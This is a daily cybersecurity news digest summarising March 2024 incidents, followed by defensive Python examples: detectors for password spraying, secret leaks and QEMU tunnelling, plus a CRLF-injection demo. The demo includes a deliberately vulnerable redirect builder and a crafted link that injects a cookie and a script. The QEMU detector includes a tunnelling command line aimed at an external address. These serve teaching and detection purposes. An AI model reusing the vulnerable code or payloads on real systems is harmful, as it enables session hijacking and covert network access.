Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11798
Checks for new stories every ~15 minutes
| Timestamp | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-03-08 23:39:12 | theregister | MALWARE | New Chrome Extension Alerts Users of Ownership Changes | A Chrome extension named Under New Management has been released to warn users when an installed extension changes hands, a change that can precede a malicious update.
Developer Matt Frisbie created the tool to combat the issue of extension hijacking, where new owners of popular extensions could inject malicious code for data theft, ad injection, or cryptomining.
Google has been focusing on detecting malicious code through sophisticated automatic analysis tools, and the Under New Management extension aims to supplement these efforts by providing user alerts.
Ownership changes in extensions are a concern because they can easily occur without meaningful oversight, potentially affecting a vast number of users given Chrome's extensive user base and the automatic update feature of extensions.
Frisbie, a Google Developer Expert on Browser Extensions, advocates for transparency in ownership changes and is also developing ExBoost, a promotion platform intended to increase safety in the extensions ecosystem.
Google's Chrome team has taken an interest in Frisbie's work and is considering implementing an API similar to Under New Management's functionality as an official feature. | Details |
| 2024-03-08 23:39:11 | bleepingcomputer | RANSOMWARE | BlackCat Ransomware Exit Scam and Ongoing Global Cyber Attacks | The BlackCat/ALPHV ransomware operation has shut down, following an FBI infiltration of its infrastructure and its subsequent, widely criticised decision to let affiliates target critical infrastructure.
The group then pulled an exit scam, keeping a $22 million ransom that an affiliate was owed and falsely blaming a law enforcement seizure.
UnitedHealth's Change Healthcare suffered a ransomware attack causing severe disruptions in the US healthcare system, including insurance and prescription billing issues.
BlackCat then announced it was closing the operation, citing law enforcement pressure; such shutdowns usually precede a rebrand and a return to business under a new name.
Swiss government disclosed a Play ransomware attack resulting in the leak of 65,000 sensitive documents.
FBI's Internet Crime Complaint Center reported that the U.S. incurred a record $12.5 billion loss to online crime in 2023.
Noteworthy cyber incidents included ransomware attacks on Belgian beer maker Duvel Moortgat Brewery and UK outsourcing company Capita.
Other ransomware updates included new variants of STOP, SkyNet, Makop, and MedusaLocker ransomware identified by cybersecurity researchers. | Details |
| 2024-03-08 22:58:29 | theregister | CYBERCRIME | Magnet Goblin Exploits Ivanti Flaws to Target US Sectors | New cybercrime group Magnet Goblin has been exploiting vulnerabilities in Ivanti devices to penetrate US medical, manufacturing, and energy sectors.
The group acted swiftly, utilizing an Ivanti exploit one day after the public release of a corresponding proof-of-concept (PoC).
The US Cybersecurity and Infrastructure Security Agency (CISA) detected compromises in two of its systems using Ivanti products, but operations remained unaffected due to robust incident response measures.
Magnet Goblin deployed multiple forms of malware, including MiniNerbian and NerbianRAT, as well as using legitimate tools like ScreenConnect and AnyDesk for remote access, complicating detection processes.
Magnet Goblin's rapid exploitation of "one-day vulnerabilities", flaws that are already disclosed and patched but not yet fixed in many deployments, highlights how short the window between patch release and exploitation has become.
While exploitation of the Ivanti flaws was initially attributed to state-sponsored actors, financially motivated criminals such as Magnet Goblin are now using them too. CISA advises heightened vigilance and a review of its recent advisory on Ivanti.
Arctic Wolf has linked some of the group's Qlik Sense exploitation to subsequent Cactus ransomware infections, showing the range of follow-on activity these intrusions feed. | Details |
| 2024-03-08 22:27:42 | bleepingcomputer | CYBERCRIME | BlackCat Ransomware Shutdown Post-Multi-Million Dollar Heist | The BlackCat/ALPHV ransomware gang closed operations after purportedly conning an affiliate of a $22 million ransom from Optum, part of UnitedHealth Group.
Law enforcement breached the ransomware group's servers, leading to an escalatory targeting of US critical infrastructure.
The FBI's months-long infiltration allowed seizure of the gang's data leak site domain amid a tug-of-war battle.
BlackCat's attack on Change Healthcare disrupted US healthcare, hindering pharmacy operations and causing patients to face full medication prices.
Despite paying the ransom, Optum did not receive its promised share due to what BlackCat claimed was federal seizure but was, in reality, an exit scam.
Other ransomware news includes the attack on Belgian beer maker Duvel and the Swiss government reporting a leak of 65,000 documents due to a ransomware attack.
The FBI's Internet Crime Complaint Center reported a record loss of $12.5 billion to online crime in 2023.
Discussions about banning ransom payments are intensifying as cybercriminals continue to profit significantly from their attacks. | Details |
| 2024-03-08 20:40:49 | bleepingcomputer | CYBERCRIME | Critical Flaw in Fortinet Devices Exposes 150,000 Systems to Exploits | Approximately 150,000 Fortinet devices worldwide remain vulnerable to CVE-2024-21762, a critical flaw in the FortiOS SSL VPN component that allows unauthenticated remote code execution.
CISA has included the flaw in its Known Exploited Vulnerabilities catalog, confirming that it's actively being exploited.
The Shadowserver Foundation identified the exposed devices, which are still unpatched nearly a month after Fortinet released a fix.
The majority of the vulnerable devices are located in the United States, with India, Brazil, and Canada also hosting a significant number.
Information on the actual exploitation of CVE-2024-21762 is limited, suggesting possible use in targeted attacks by sophisticated threat actors.
Bishop Fox has published a Python script that organisations can run against their own SSL VPN endpoints to check whether they are still vulnerable.
FortiOS and FortiProxy underpin Fortinet's appliances, providing DoS protection, IPS, firewalling, VPN and secure web proxy services. | Details |
| 2024-03-08 20:05:03 | bleepingcomputer | CYBERCRIME | QNAP Alerts Users to Critical NAS Security Vulnerabilities | QNAP warns of critical vulnerabilities in NAS software that can allow unauthorized access.
The three disclosed flaws are an authentication bypass, a command injection and a SQL injection.
The most severe, CVE-2024-21899, is an improper-authentication bug that can be exploited remotely without credentials and with low attack complexity.
Affected QNAP operating systems are QTS 5.1.x, QTS 4.5.x, QuTS hero h5.1.x, h4.5.x, QuTScloud c5.x, and myQNAPcloud 1.0.x.
Users are urged to update their system firmware as soon as possible to mitigate the risks.
Due to large amounts of valuable data stored, NAS devices are prime targets for attacks, including ransomware.
Past incidents involve ransomware groups like DeadBolt, Checkmate, and Qlocker exploiting NAS vulnerabilities. | Details |
| 2024-03-08 17:57:12 | bleepingcomputer | CYBERCRIME | UnitedHealth's Change Healthcare Recovers from Ransomware Attack | UnitedHealth Group's Change Healthcare platform suffered a significant ransomware attack by ALPHV/BlackCat, debilitating systems and disrupting U.S. healthcare operations.
The attack, which began on February 21, 2024, encrypted servers and forced IT systems offline, halting the processing of pharmacy claims and payments.
As of March 7, the company has restored electronic prescription systems and payment transmissions, with medical claims processing resuming with a throughput of 90% and expected to improve shortly.
Change Healthcare has announced that full restoration of electronic payments platforms is targeted for March 15, with initial testing for medical claims systems set for March 18, 2024.
UnitedHealth Group offers interim solutions and encourages stakeholders to utilize workarounds for continuity, though warns of potential instability during the recovery phase.
In response to the financial constraints faced by healthcare providers, Optum launched a temporary funding assistance program, and the U.S. Department of Health and Human Services has announced measures to mitigate the attack's impact.
Reports indicate that a $22 million ransom may have been paid to prevent data leakage and secure a file decryptor, amidst claims of an exit scam by the BlackCat ransomware group. | Details |
| 2024-03-08 17:00:59 | theregister | NATION STATE ACTIVITY | Russian Spies Compromise Microsoft Source Code Repositories | Microsoft confirms that the Russian espionage group Midnight Blizzard, also tracked as APT29 and Cozy Bear, has accessed its source code repositories and internal systems and stolen internal information.
The breach, part of an ongoing intrusion, initially focused on a small number of executive email accounts, from which internal messages and documents were taken.
No evidence has been found that customer data, production systems, or AI systems have been compromised, despite the attackers' efforts.
The threat actors have used information obtained from company emails to attempt unauthorized access to other internal systems and repositories.
Microsoft is actively contacting customers who may be impacted by the breach to help implement mitigating measures.
The intensity of password spray attacks increased significantly in February, indicating that the espionage efforts are continuing to escalate.
Despite the security breach, Microsoft reports no financial impact on its operations and commits to ongoing investigations and sharing updates with the public.
The attack underscores the sophistication of nation-state actors in the current global threat landscape and their capacity for coordinated, resource-intensive cyber operations. | Details |
| 2024-03-08 15:31:49 | bleepingcomputer | NATION STATE ACTIVITY | Microsoft Targeted by Russian Hackers: Corporate Systems Breached | Russian hackers known as 'Midnight Blizzard' compromised internal systems at Microsoft, gaining access to source code.
The intrusion began in January with a password spray attack against a legacy, non-production test tenant account; the group then pivoted into corporate email accounts and later used secrets found in those emails to reach further systems.
The test account had no multi-factor authentication enabled, which is what let a guessed password turn into a foothold in Microsoft's systems.
Microsoft observed a significant uptick in password spray attacks in February, with a tenfold increase from January, which underscores the importance of enabling multi-factor authentication.
Customers potentially affected by the leak of secrets in stolen emails are being contacted by Microsoft for mitigation assistance.
No evidence suggests that customer-facing systems hosted by Microsoft have been compromised.
Microsoft has since increased security measures and coordination both enterprise-wide and with federal law enforcement to combat such advanced persistent threats. | Details |
| 2024-03-08 14:35:20 | theregister | CYBERCRIME | Change Healthcare Begins Recovery Post-$22M Ransomware Incident | Change Healthcare suffered a ransomware attack in February that crippled its services and severely disrupted hospitals and pharmacies across the US.
Electronic prescription services have been restored, signaling the commencement of a path to full recovery.
UnitedHealth Group, owner of Change Healthcare, indicated that electronic payments and medical claims management systems are on track for restoration by mid-March.
The US government, acknowledging disruptions, allowed temporary advance funding for Medicare services to mitigate cash flow challenges in the healthcare sector.
The attack is attributed to the ALPHV/BlackCat ransomware gang, which appears to have collected a $22 million payment and has since announced a shutdown in what looks like an exit scam.
Investigations are ongoing, with involvement from the UK's National Crime Agency and Europol, while the FBI has not yet provided comments on the closure of the ALPHV operations. | Details |
| 2024-03-08 13:18:45 | thehackernews | MISCELLANEOUS | Meta Prepares WhatsApp and Messenger for EU Interoperability | Meta is aligning WhatsApp and Messenger with the EU’s Digital Markets Act (DMA) to facilitate interoperability with third-party messaging services.
The DMA, whose obligations on designated gatekeepers became enforceable on March 7, 2024, targets major tech companies to prevent anti-competitive practices and promote a level playing field.
Meta requires third-party services to use the Signal Protocol for end-to-end encryption and to package encrypted messages as XML stanzas.
Under Meta's proposed "plug-and-play" model, third-party clients connect directly to Meta's servers using Meta's own client-server protocol, avoiding an intermediary.
Third-party clients must adhere to technical requirements, including authentication and the WhatsApp Enlistment API, to join WhatsApp or Messenger networks.
Meta flags trade-offs such as a larger data-leak surface and weaker spam filtering when a third-party proxy sits between the client and Meta's servers.
The interoperability move is set to transform the messaging landscape in the EU, impacting how consumers and businesses communicate across platforms. | Details |
| 2024-03-08 12:37:52 | theregister | DATA BREACH | Swiss Government Supplier Hit by Ransomware, Thousands of Sensitive Files Leaked | The Swiss government's IT supplier Xplain was breached by the Play ransomware gang, resulting in the theft of 65,000 files relating to the Swiss Federal Administration.
The National Cyber Security Center (NCSC) reported that a total of 1.3 million files were taken during the May 2023 incident, with 5 percent related to the government, including classified documents and personal information.
Personal data compromised included names, addresses, and phone numbers, while technical and classified files were also among the stolen data.
Only a small fraction of the leaked files contained readable passwords, but the breach still represented a significant security lapse.
An administrative investigation began in August 2023 to analyze the breach at Xplain, with the final report expected to provide recommendations to prevent similar incidents.
The Swiss federal offices and service providers coordinated closely under the NCSC to manage the incident and mitigate its impact. | Details |
| 2024-03-08 09:55:11 | thehackernews | MISCELLANEOUS | Essential Guide to Effective Secrets Management Strategies | Secrets management is critical for cybersecurity, focusing on the protection of API keys, connection strings, and certificates.
Common secrets management mistakes include improper storage, weak encryption of secrets at rest, and lack of proactive strategies.
Kubernetes can encrypt Secrets at rest in etcd, but not by default: without an explicit EncryptionConfiguration for the API server, Secrets are stored merely base64-encoded.
Reducing false positives from secrets scanning is key to operational efficiency, so that security teams spend their time on genuine leaks.
A proper secrets management approach involves integrating it into the development lifecycle and avoiding hard-coded secrets.
Vaults for secrets management should be monitored for misconfigurations and excess access risks.
Best practices in secrets management include a culture of security mindfulness and continuous adaptation to new cybersecurity challenges.
Entro offers a full-context platform to address secrets management challenges, monitor risks, and provide insights for decision-making. | Details |
| 2024-03-08 08:13:21 | thehackernews | CYBERCRIME | Cisco Patches Crucial Vulnerability in Secure Client VPN | Cisco has released updates to remedy a high-severity vulnerability in its Secure Client software which could let attackers hijack VPN sessions.
Tracked as CVE-2024-20337 with a CVSS score of 8.2, the flaw stems from insufficient validation of user-supplied input and allows carriage return/line feed (CRLF) injection.
An attacker who persuades a user to click a crafted link while establishing a VPN session could execute arbitrary script code in the browser or read browser-based data, including a valid SAML token.
The compromised SAML tokens could be used by the attacker to start a VPN session with the privileges of the affected user, although additional credentials are still required for deeper network access.
The vulnerability affects Secure Client versions for Windows, Linux, and macOS, and is fixed in the updated releases.
Researcher Paulos Yibelo Mesfin is credited with discovering the flaw and suggests that it could allow attackers to penetrate local internal networks.
Another separate high-severity issue, CVE-2024-20338, affecting Secure Client for Linux, was also patched. It allowed privilege escalation and has been fixed in version 5.1.2.42. | Details |
| 2024-03-08 07:52:51 | thehackernews | MISCELLANEOUS | QEMU Misused for Network Breach in Sophisticated Cyber Attack | Threat actors abused QEMU, an open-source hardware emulator, to build a covert network tunnel during an attack on a large company.
Kaspersky researchers found the attackers using QEMU to reach systems on the victim's network that had no direct internet access.
This is the first documented case of QEMU being used by adversaries as tunneling software.
The attackers ran QEMU with a virtual (user-mode) network interface bridged to a socket-type network interface, so traffic passing through the emulated machine was relayed to a remote server.
The method allowed for the blending of malicious traffic with legitimate activity, making detection more challenging.
Kaspersky stresses the value of multi-layered defence against targeted attacks, combining endpoint protection with dedicated threat detection and response.
The attack signifies an evolving threat landscape where legitimate tools are repurposed for malicious intent, stressing the need for continuous vigilance and updated security measures. | Details |
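The two Midnight Blizzard entries above describe a password spray (a few common passwords tried across many accounts) turning into a foothold on a test account that had no MFA. The following is an added example, not Microsoft's tooling or code from either article, of the detection logic a SOC would run over sign-in logs: it flags a source IP that fails against many distinct accounts inside a short window, which separates a spray from brute force against one account, and then lists any later success from that IP as the account to treat as compromised. The log format, window, threshold, IP addresses and account names are all constructed for the example.

```python
"""Password-spray detection over sign-in logs (added example, not Microsoft tooling).

A spray is many DISTINCT accounts failing from one source in a short window;
brute force is one account failing many times. The window, threshold, log
format and every sample line below are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sign-in records: "<UTC timestamp> <source IP> <account> <result>".
# 203.0.113.7 sprays six accounts and finally lands on a test account with no MFA;
# 198.51.100.9 hammers one account (brute force, not a spray); 192.0.2.4 is benign.
SAMPLE_LOG = """\
2024-01-12T02:00:01Z 203.0.113.7 alice FAIL
2024-01-12T02:00:03Z 203.0.113.7 bob FAIL
2024-01-12T02:00:05Z 203.0.113.7 carol FAIL
2024-01-12T02:00:07Z 203.0.113.7 dave FAIL
2024-01-12T02:00:09Z 203.0.113.7 erin FAIL
2024-01-12T02:00:11Z 203.0.113.7 legacy-test FAIL
2024-01-12T02:00:13Z 203.0.113.7 legacy-test SUCCESS
2024-01-12T02:01:00Z 198.51.100.9 alice FAIL
2024-01-12T02:01:02Z 198.51.100.9 alice FAIL
2024-01-12T02:01:04Z 198.51.100.9 alice FAIL
2024-01-12T02:01:06Z 198.51.100.9 alice FAIL
2024-01-12T02:01:08Z 198.51.100.9 alice FAIL
2024-01-12T02:01:10Z 198.51.100.9 alice FAIL
2024-01-12T02:05:00Z 192.0.2.4 alice SUCCESS
"""


def parse_line(line):
    """Split one record into (timestamp, source_ip, account, result)."""
    ts, ip, user, result = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result


def detect_spray(log_text, window=timedelta(minutes=10), min_users=5):
    """Return {source_ip: sorted accounts} for every IP whose failed sign-ins
    cover at least `min_users` distinct accounts inside any `window`."""
    events = sorted(parse_line(l) for l in log_text.splitlines() if l.strip())
    fails = defaultdict(list)
    for ts, ip, user, result in events:
        if result == "FAIL":
            fails[ip].append((ts, user))

    alerts = {}
    for ip, rows in fails.items():
        best, start = set(), 0
        for end in range(len(rows)):
            # Slide the window start forward until it spans at most `window`.
            while rows[end][0] - rows[start][0] > window:
                start += 1
            users = {u for _, u in rows[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            alerts[ip] = sorted(best)
    return alerts


def compromised_after_spray(log_text, alerts):
    """Accounts that later authenticated successfully from a spraying IP:
    these are the sign-ins to treat as compromised, not merely suspicious."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, ip, user, result = parse_line(line)
        if result == "SUCCESS" and ip in alerts:
            hits.append((ip, user))
    return hits


if __name__ == "__main__":
    found = detect_spray(SAMPLE_LOG)
    for ip, users in found.items():
        print(f"spray from {ip}: {len(users)} accounts {users}")
    for ip, user in compromised_after_spray(SAMPLE_LOG, found):
        print(f"COMPROMISED: {user} signed in from spraying IP {ip}")
```

On the sample, 203.0.113.7 is reported with six accounts and the later success on `legacy-test` is surfaced as the compromised account; 198.51.100.9 is not reported despite six failures, because they all hit one account. In production the same logic should also group by ASN or user-agent, since a patient sprayer rotates source IPs.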
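The secrets-management entry above warns against hard-coded secrets and stresses keeping false positives down. As an added example (not Entro's product and not code from the article), here is a small scanner of the kind run as a pre-commit check: structured patterns catch a well-known key format and credentials embedded in connection strings, and a Shannon-entropy gate keeps placeholder values such as `"password"` or a run of x's from being reported. The sample source lines are constructed; the AWS values are the placeholder credentials AWS uses in its own documentation, not live keys.

```python
"""Hard-coded secret scanner with entropy-based false-positive suppression.

Added example, not the article's or any vendor's code. Rule patterns,
thresholds and the sample source are all constructed for this example.
"""
import math
import re

# Constructed sample source file. The AWS key values are the placeholder
# credentials from AWS's own documentation, not real keys.
SAMPLE_SOURCE = """\
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
aws_secret_access_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
DB_URL = "postgres://app:s3cr3tP%40ss@db.internal:5432/app"
api_key = os.environ["API_KEY"]
password = "password"
token = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
LOG_LEVEL = "DEBUG"
"""

# Structured patterns: the format itself identifies the secret, no entropy needed.
AWS_ACCESS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
URL_CREDENTIAL_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://[^:/\s'\"]+:[^@\s'\"]+@", re.I)
# Generic pattern: a sensitive-looking name assigned a quoted string literal.
SENSITIVE_ASSIGN_RE = re.compile(
    r"(?i)\b(\w*(?:secret|password|passwd|pwd|token|api[_-]?key|access[_-]?key)\w*)"
    r"\s*[=:]\s*['\"]([^'\"]+)['\"]"
)
# Values that look like secrets by name but are obviously not real.
PLACEHOLDERS = {"password", "changeme", "example", "todo", "secret", "xxx"}


def shannon_entropy(value):
    """Bits of entropy per character; random keys sit well above 3, words below."""
    if not value:
        return 0.0
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan(source, min_entropy=3.0, min_len=8):
    """Return [(line_no, rule)] for each line that looks like a hard-coded secret.
    Rules are checked in order and a line is reported at most once."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if AWS_ACCESS_KEY_RE.search(line):
            findings.append((no, "aws-access-key-id"))
            continue
        if URL_CREDENTIAL_RE.search(line):
            findings.append((no, "credentials-in-url"))
            continue
        m = SENSITIVE_ASSIGN_RE.search(line)
        if not m:
            continue
        value = m.group(2)
        # Entropy gate: skip short values, placeholders and low-entropy strings.
        if (len(value) >= min_len
                and value.lower() not in PLACEHOLDERS
                and shannon_entropy(value) >= min_entropy):
            findings.append((no, "high-entropy-secret"))
    return findings


if __name__ == "__main__":
    for no, rule in scan(SAMPLE_SOURCE):
        print(f"line {no}: {rule}")
```

Lines 1 to 3 of the sample are reported; line 4 reads the value from the environment and is not, and lines 5 and 6 are suppressed by the placeholder list and the entropy gate respectively. The ordering matters: structured rules run first so a value with a known format is never left to the entropy heuristic, which is the part of the scanner that produces noise.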
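The Cisco entry above describes CVE-2024-20337 as a CRLF injection reached through a crafted link. The article does not give the affected endpoint or parameter, so the following added example (not Cisco's code) shows the bug class generically: a local handler that builds an HTTP redirect from a URL parameter. Because query-string decoding turns `%0D%0A` into a real CR/LF pair, the unchecked version lets the attacker terminate the `Location` header and append their own headers and a body (response splitting), which is how injected script or cookies reach the browser. The hardened version rejects control characters and restricts the destination to an allow-listed host. The host names, port and `redirect` parameter name are assumptions made for the example.

```python
"""CRLF injection in a redirect builder: vulnerable and hardened versions.

Added example of the bug class, not Cisco's code. The host names, port and
the `redirect` parameter are assumptions made for the example.
"""
from urllib.parse import parse_qs, quote, urlparse

ALLOWED_HOSTS = {"vpn.example.test"}  # hypothetical allow-list of redirect targets


def build_redirect_vulnerable(target):
    """Bug: the untrusted value is interpolated straight into the header block."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + target + "\r\n"
            "Content-Length: 0\r\n\r\n")


def build_redirect_hardened(target):
    """Reject any control character (CR, LF, NUL, ...) and restrict the destination."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        raise ValueError("control character in redirect target")
    parsed = urlparse(target)
    if parsed.scheme != "https" or parsed.hostname not in ALLOWED_HOSTS:
        raise ValueError("redirect target not on allow-list")
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + target + "\r\n"
            "Content-Length: 0\r\n\r\n")


def handle_link(url, builder):
    """Server side of a crafted link: pull `redirect` from the query string
    (percent-decoded, as any framework would do) and build the response."""
    params = parse_qs(urlparse(url).query)
    target = params.get("redirect", [""])[0]
    return builder(target)


def hardened_rejects(url):
    """True when the hardened builder refuses the redirect carried by `url`."""
    try:
        handle_link(url, build_redirect_hardened)
        return False
    except ValueError:
        return True


def parse_response(raw):
    """Split a raw response as a browser would: (status line, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return status, headers, body


# Constructed attacker payload: a valid-looking target followed by an encoded
# CR/LF pair, an injected cookie header, and a second header block with a body.
MALICIOUS_TARGET = ("https://vpn.example.test/\r\n"
                    "Set-Cookie: session=attacker\r\n"
                    "Content-Length: 25\r\n\r\n"
                    "<script>alert(1)</script>")
CRAFTED_LINK = "http://127.0.0.1:8080/auth?redirect=" + quote(MALICIOUS_TARGET, safe="")
BENIGN_LINK = "http://127.0.0.1:8080/auth?redirect=" + quote("https://vpn.example.test/saml", safe="")


if __name__ == "__main__":
    status, headers, body = parse_response(handle_link(CRAFTED_LINK, build_redirect_vulnerable))
    print("vulnerable:", headers.get("Set-Cookie"), body[:25])
    print("hardened rejects crafted link:", hardened_rejects(CRAFTED_LINK))
    print("hardened rejects benign link:", hardened_rejects(BENIGN_LINK))
```

Against the vulnerable builder the browser sees a `Set-Cookie` header the server never meant to send and a body containing the attacker's script; the hardened builder refuses the same link before any header is written. Filtering only `\r\n` is not enough, since a lone `\n` is accepted as a line terminator by some parsers, which is why the check rejects the whole control-character range.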
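The QEMU entry above describes the tunnel as a virtual network interface paired with a socket-type network interface, on a host that has no other reason to run an emulator. That leaves a distinctive process-creation signature. The following added example (not Kaspersky's code) scores QEMU command lines from endpoint process telemetry: a socket-type netdev pointing at an external address, a user-mode netdev bridged to it through hubport, no disk image, a tiny guest memory size and headless operation each add to the score. The event records, host names and addresses are constructed; the suspicious command line is modelled on the option combination the technique requires, not copied from the report.

```python
"""Spotting QEMU used as a network tunnel in process-creation telemetry.

Added example, not Kaspersky's code. The records below are constructed; the
first command line is modelled on the option combination the tunnelling
technique needs (user-mode netdev bridged via hubport to a socket netdev),
the second is an ordinary developer VM, the third is unrelated noise.
"""
import re

SAMPLE_EVENTS = [
    {"host": "WS-017",
     "image": r"C:\Users\Public\qemu\qemu-system-i386.exe",
     "cmdline": ("qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off "
                 "-netdev socket,id=sock,connect=203.0.113.10:443 "
                 "-netdev hubport,id=port-lan,hubid=0,netdev=lan "
                 "-netdev hubport,id=port-sock,hubid=0,netdev=sock -nographic")},
    {"host": "DEV-BUILD-02",
     "image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",
     "cmdline": (r"qemu-system-x86_64.exe -m 4G -hda C:\vms\ubuntu.qcow2 "
                 "-netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0")},
    {"host": "WS-020",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

NETDEV_RE = re.compile(r"-netdev\s+(\w+),(\S*)")
ENDPOINT_RE = re.compile(r"(?:connect|listen)=([^,\s]+)")
DISK_RE = re.compile(r"-(?:hda|hdb|drive|cdrom|blockdev)\b")
MEMORY_RE = re.compile(r"-m\s+(\d+)([MmGg]?)\b")


def guest_memory_mib(cmdline):
    """Guest RAM from `-m`, in MiB; None when QEMU's default applies."""
    m = MEMORY_RE.search(cmdline)
    if not m:
        return None
    size, unit = int(m.group(1)), m.group(2).upper()
    return size * 1024 if unit == "G" else size


def analyse(event):
    """Return {'host', 'score', 'reasons'} for a QEMU process, else None."""
    if "qemu-system" not in event["image"].lower():
        return None
    cmd = event["cmdline"]
    netdevs = NETDEV_RE.findall(cmd)
    backends = {backend for backend, _ in netdevs}
    reasons = []
    for backend, opts in netdevs:
        if backend == "socket":
            ep = ENDPOINT_RE.search(opts)
            reasons.append("socket netdev to " + (ep.group(1) if ep else "<unknown>"))
    if {"user", "socket", "hubport"} <= backends:
        reasons.append("user netdev bridged to socket netdev via hubport")
    if not DISK_RE.search(cmd):
        reasons.append("no disk image: nothing to boot, only a network path")
    mem = guest_memory_mib(cmd)
    if mem is not None and mem < 64:
        reasons.append(f"guest memory {mem} MiB, too small for a real OS")
    if "-nographic" in cmd:
        reasons.append("headless")
    return {"host": event["host"], "score": len(reasons), "reasons": reasons}


def find_tunnels(events, threshold=3):
    """Events whose QEMU invocation looks like a tunnel rather than a VM."""
    results = (analyse(e) for e in events)
    return [r for r in results if r is not None and r["score"] >= threshold]


if __name__ == "__main__":
    for hit in find_tunnels(SAMPLE_EVENTS):
        print(hit["host"], hit["score"], "; ".join(hit["reasons"]))
```

The developer VM scores zero and the constructed tunnel scores five, so a threshold of three separates them with room to spare. The strongest single indicator is the socket-type netdev with an external `connect=` address, which is worth alerting on by itself on any host outside a virtualisation team; the remaining checks exist to keep the rule quiet on legitimate emulator use.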